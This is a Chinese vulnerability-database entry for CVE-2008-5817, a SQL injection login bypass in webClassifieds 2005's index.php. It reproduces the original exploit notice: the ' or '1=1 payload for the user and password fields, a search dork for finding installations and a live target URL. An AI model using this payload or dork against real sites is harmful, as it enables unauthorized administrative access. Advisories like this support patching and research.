Web Scribble Solutions webClassifieds 'index.php' 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117169 漏洞类型 SQL注入
发布时间 2008-12-29 更新时间 2009-01-29
CVE编号 CVE-2008-5817 CNNVD-ID CNNVD-200901-012
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7602
https://cxsecurity.com/issue/WLB-2009010117
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-012
|漏洞详情
WebScribbleSolutionswebClassifieds是基于PHP的网络应用解决方案。WebScribbleSolutionswebClassifieds2005版本中的index.php存在多个SQL注入漏洞。远程攻击者可以借助sign_in操作中的用户和密码字段,来执行任意的SQL指令。
|漏洞EXP
************************************************************
** 		 webClassifieds™© 2005 Admin Login Bypass vulnerability
************************************************************
**  Prodcut:		webClassifieds™© 2005    
**  Home   : 		http://www.webscribble.com/
**  Vunlerability :		Admin Bypass
**  Risk  :			low
**  Dork : 		"powered by webClassifieds"
************************************************************
** Discovred by:	AnGeL25dZ
** From	       :	Constantine - Algeria
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeachTeam    http://www.hackteach.org/
** 		 cold zero, Ra3ch, His0k4
************************************************************
**  Exploit:
**  http://[PATH]//classifieds/index.php?page=sign_in
**
**  user :              admin      /        user :           ' or '1=1
**  password :     ' or '1=1   /        password:    ' or '1=1
**  
****************************************************************
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
****************************************************************

# milw0rm.com [2008-12-29]
|参考资料

来源:XF
名称:webclassifieds-index-sql-injection(47629)
链接:http://xforce.iss.net/xforce/xfdb/47629
来源:BID
名称:33028
链接:http://www.securityfocus.com/bid/33028
来源:MILW0RM
名称:7602
链接:http://www.milw0rm.com/exploits/7602
来源:SREASON
名称:4860
链接:http://securityreason.com/securityalert/4860
来源:SECUNIA
名称:33337
链接:http://secunia.com/advisories/33337